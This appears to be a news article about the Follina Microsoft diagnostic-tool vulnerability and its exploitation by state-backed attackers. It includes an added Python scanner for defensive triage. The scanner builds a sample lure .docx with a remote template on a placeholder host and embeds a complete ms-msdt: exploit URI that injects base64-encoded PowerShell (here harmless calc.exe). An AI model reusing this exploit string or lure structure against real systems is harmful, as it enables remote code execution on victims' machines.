Researchers warned over the weekend that a flaw in Microsoft’s Support Diagnostic Tool could be exploited, using a malicious Word document, to remotely take control of a target device. Microsoft published guidance on Monday, including temporary defensive measures. By Tuesday, the U.S. Cybersecurity and Infrastructure Security Agency had warned that “a remote, unauthenticated attacker could exploit this vulnerability,” dubbed Follina, “to take control of an affected system.” But Microsoft would not say when, or whether, a patch for the flaw will be released, even though the company has acknowledged that the flaw is being actively exploited by attackers in the wild. When asked by WIRED yesterday, the company still had no comment on the possibility of a patch.
The Follina vulnerability, in the Microsoft Support Diagnostic Tool, can be exploited by a specially crafted Word document. The lure carries a remote template that retrieves a malicious HTML file; that HTML invokes the diagnostic tool through its URL protocol handler and ultimately lets the attacker execute PowerShell commands on the Windows host. Researchers say they would describe the bug as a “zero-day,” a previously unknown vulnerability, but Microsoft has not classified it as such.
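The chain described above leaves two inspectable artifacts: the document's remote-template relationship and the HTML that relationship fetches. The Python scanner below is an added example, not code from the article or from any of the researchers it quotes. It pulls the external template URL out of a .docx and, given the HTML served from that URL, flags an ms-msdt: URI that injects a PowerShell subexpression through the diagnostic tool's IT_BrowseForFile parameter and decodes the base64 it carries. The .docx, the HTML and the example.invalid URL are constructed for the example, modelled on the structure public analyses of the Follina document described; the embedded payload decodes to the harmless string calc.exe.

```python
"""Scan the two stages of a Follina-style lure: a .docx whose attached template
is fetched from a remote URL, and the HTML at that URL, which redirects to an
ms-msdt: URI that smuggles PowerShell through a diagnostic parameter.
Added example; the document, HTML and URL below are constructed samples."""
from __future__ import annotations

import base64
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")

# An ms-msdt: URI inside a JavaScript string literal; \" escapes belong to it.
MSDT_URI = re.compile(r'ms-msdt:(?:\\.|[^"\\])*')
# The base64 handed to FromBase64String(), with or without [char]34 quote tricks.
B64_ARG = re.compile(r"FromBase64String\([^)]*?([A-Za-z0-9+/]{8,}={0,2})")


def build_sample_docx(template_url: str) -> bytes:
    """Construct a minimal .docx that attaches a template from template_url.
    Only the parts the scanner reads are present (constructed sample)."""
    settings = (
        '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<w:attachedTemplate r:id="rId1"/></w:settings>'
    )
    rels = (
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{template_url}" TargetMode="External"/></Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/settings.xml", settings)
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


def remote_template_targets(docx_bytes: bytes) -> list[str]:
    """Return every attachedTemplate relationship whose target is external.
    A locally templated document yields none; a remote-template lure yields one."""
    targets: list[str] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "word/_rels/settings.xml.rels" not in z.namelist():
            return targets
        root = ET.fromstring(z.read("word/_rels/settings.xml.rels"))
    for rel in root.iter(f"{{{REL_NS}}}Relationship"):
        if rel.get("Type") == ATTACHED_TEMPLATE and rel.get("TargetMode") == "External":
            targets.append(rel.get("Target", ""))
    return targets


def _decode_b64(token: str) -> str | None:
    """Decode a base64 token to printable text, or None if it is not one."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def analyze_html(html: str) -> list[dict]:
    """Report each ms-msdt: URI in a page: whether it injects a PowerShell
    subexpression via IT_BrowseForFile, and any base64 payload it carries."""
    findings = []
    for uri in MSDT_URI.findall(html):
        payloads = [p for p in map(_decode_b64, B64_ARG.findall(uri)) if p]
        findings.append({
            "uri": uri,
            "injects_subexpression": "IT_BrowseForFile" in uri and "$(" in uri,
            "decoded_payloads": payloads,
        })
    return findings


# Constructed stand-in for the page a lure's remote template would fetch.
SAMPLE_HTML = (
    "<!doctype html><html><body><script>\n"
    'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    r'\"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed '
    r"IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'"
    r"+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+"
    r"'FromBase64String('+[char]34+'Y2FsYy5leGU='+[char]34+'))'))))i/../../Windows/System32/mpsigstub.exe "
    r'IT_AutoTroubleshoot=ts_AUTO\"";'
    "\n</script></body></html>"
)

if __name__ == "__main__":
    lure = build_sample_docx("https://example.invalid/lure/index.html")
    for url in remote_template_targets(lure):
        print("remote template:", url)
    # In real triage the HTML is fetched from that URL; here the sample stands in.
    for finding in analyze_html(SAMPLE_HTML):
        print("ms-msdt URI:", finding["uri"][:60] + "...")
        print("injects PowerShell subexpression:", finding["injects_subexpression"])
        print("decoded payload:", finding["decoded_payloads"])
```

Running it prints the template URL, the start of the URI and the decoded payload. The URI pattern deliberately tolerates the \" escapes of a JavaScript string literal, and base64 extraction looks only at the argument of FromBase64String() so that ordinary words in the URI are not misread as encoded data. In triage the decoded text is what you hand to the next stage of analysis, never something you execute.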
Tom Hegel, a senior threat researcher at security firm SentinelOne, said: “As the public learns more about the vulnerability, we’re starting to see immediate responses from various attackers who start using it.” Attackers have been observed exploiting the vulnerability through malicious documents, but researchers have also discovered other methods, including manipulating HTML content in web traffic.
“While the malicious-document method is very concerning, the less documented methods that can trigger the exploit are troubling until it is patched,” Hegel said. “I expect opportunistic and targeted threat actors to use this vulnerability in various ways when options are available – it’s too easy.”
The vulnerability exists in all supported Windows versions and can be exploited through Microsoft Office 365, Office 2013 to 2019, Office 2021, and Office ProPlus. The main mitigations proposed by Microsoft are disabling the diagnostic tool’s URL protocol handler (the ms-msdt: scheme, by exporting a backup of its registry key under HKEY_CLASSES_ROOT and then deleting the key) and relying on Microsoft Defender Antivirus to detect and block exploitation attempts.
But incident responders say more action is needed, given how easy the vulnerability is to exploit and how much malicious activity has already been detected.
Michael Raggi, a staff threat researcher at security firm Proofpoint who focuses on Chinese state-backed hackers, said: “We’re seeing various APT actors integrate this technique into longer infection chains that exploit the Follina vulnerability. For example, on May 30, 2022, we observed Chinese APT actor TA413 sending a malicious URL in an email posing as the Central Tibetan Administration. Different actors insert Follina-related files at different stages of their infection chain, depending on their pre-existing toolkit and deployed strategy.”
Researchers have also seen malicious documents exploiting Follina against targets in Russia, India, the Philippines, Belarus and Nepal. An undergraduate researcher first noticed the flaw in August 2020, but it was first reported to Microsoft on April 21. Researchers also noted that Follina is particularly useful to attackers because it can be triggered from a malicious document without relying on macros, the much-abused Office feature that Microsoft has been working hard to rein in.
Sherrod DeGrippo, vice president of threat research at Proofpoint, said: “Proofpoint has identified a variety of actors using the Follina vulnerability in phishing campaigns.”
Given all these real-world exploits, the question is whether the guidance Microsoft has issued so far is sufficient and proportionate to the risk.
“Security teams can view Microsoft’s indifferent approach as a sign that it’s ‘just another vulnerability,’” said Jake Williams, director of cyber threat intelligence at security firm Scythe. “It’s not clear why Microsoft continues to downplay this vulnerability, especially when it’s actively exploited in the wild,” he said.